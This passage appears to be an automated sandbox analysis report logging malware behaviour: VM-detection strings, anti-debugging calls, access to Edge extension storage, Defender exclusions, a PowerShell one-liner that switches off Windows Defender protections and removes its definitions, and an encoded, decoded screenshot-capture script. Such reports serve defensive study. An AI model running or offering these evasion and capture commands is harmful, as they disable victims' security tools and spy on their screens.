                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557139
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 557031
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 556922
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 556812
                                  Source: C:\Recovery\HpQPPZazcv.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                                  Source: s.exe, 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RcF33KCGtqeMuNK3lOt
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                                  Source: 8Ck8T5qRcC.exe, 00000000.00000002.1681039816.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}?v
                                  Source: s.exe, 00000007.00000002.1731347813.0000000007E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: based.exe, 00000004.00000002.2382641297.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1858412342.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2376943014.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2380067127.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1871128429.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.2359818591.00000201D086B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                                  Source: based.exe, 00000004.00000003.1852139141.00000201D0838000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1877831426.00000201D081E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2387215842.00000201D1569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852422435.00000201D0838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                                  Source: based.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeAPI call chain: ExitProcess graph end nodegraph_0-24893
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DB647F
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAC50740 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,4_2_00007FFDFAC50740
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DBA640 mov eax, dword ptr fs:[00000030h]0_2_00DBA640
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DBE680 GetProcessHeap,0_2_00DBE680
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Recovery\HpQPPZazcv.exeProcess token adjusted: Debug
                                  Source: C:\Recovery\HpQPPZazcv.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB215D SetUnhandledExceptionFilter,0_2_00DB215D
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB12D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00DB12D7
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DB647F
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB1FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DB1FCA
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D00C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF67D00C67C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D00BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF67D00BDE0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D00C860 SetUnhandledExceptionFilter,1_2_00007FF67D00C860
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D01ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF67D01ACD8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B32D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001F91B32D2A4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_000001F91B327D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000001F91B327D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72726C62C SetUnhandledExceptionFilter,2_2_00007FF72726C62C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72726C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF72726C44C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF72726BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF72726BBC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 2_2_00007FF727279924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF727279924
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 3_2_00007FFE1331004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFE1331004C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000201D1A4D2A4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00000201D1A47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000201D1A47D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72726C62C SetUnhandledExceptionFilter,4_2_00007FF72726C62C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72726C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF72726C44C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF72726BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF72726BBC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FF727279924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF727279924
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFAA830D8 IsProcessorFeaturePresent,00007FFE132319A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE132319A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDFAA830D8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 4_2_00007FFDFABA2004 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FFDFABA2004
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: page read and write | page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                  Source: C:\ProgramData\setup.exeNtQuerySystemInformation: Direct from: 0x7FF7FC9342AE
                                  Source: C:\Recovery\HpQPPZazcv.exeNtEnumerateValueKey: Indirect: 0x2D7293D
                                  Source: C:\Recovery\HpQPPZazcv.exeNtQuerySystemInformation: Indirect: 0x1B8C205D
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtQueryDirectoryFile: Indirect: 0x1BC223AE
                                  Source: C:\Recovery\HpQPPZazcv.exeNtQuerySystemInformation: Indirect: 0x2D72F57
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtEnumerateKey: Indirect: 0x1BC22842
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtEnumerateKey: Indirect: 0x1BC22875
                                  Source: C:\Recovery\HpQPPZazcv.exeNtResumeThread: Indirect: 0x2D7231E
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtQuerySystemInformation: Indirect: 0x1BC2205D
                                  Source: C:\Recovery\HpQPPZazcv.exeNtQuerySystemInformation: Indirect: 0x2D7205D
                                  Source: C:\Recovery\HpQPPZazcv.exeNtEnumerateValueKey: Indirect: 0x1B8C290E
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtResumeThread: Indirect: 0x1BC2231E
                                  Source: C:\Recovery\HpQPPZazcv.exeNtEnumerateKey: Indirect: 0x2D72842
                                  Source: C:\Recovery\HpQPPZazcv.exeNtEnumerateKey: Indirect: 0x2D72875
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtEnumerateValueKey: Indirect: 0x1BC2293D
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtDeviceIoControlFile: Indirect: 0x1BC22B9D
                                  Source: C:\Recovery\HpQPPZazcv.exeNtDeviceIoControlFile: Indirect: 0x1B8C2B9D
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeNtEnumerateValueKey: Indirect: 0x1BC2290E
                                  Source: C:\Recovery\HpQPPZazcv.exeNtEnumerateValueKey: Indirect: 0x2D7290E
                                  Source: C:\Recovery\HpQPPZazcv.exeNtDeviceIoControlFile: Indirect: 0x2D72B9D
                                  Source: C:\Recovery\HpQPPZazcv.exeNtEnumerateValueKey: Indirect: 0x1B8C293D
                                  Source: C:\ProgramData\setup.exeSection loaded: NULL target: unknown protection: readonly
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
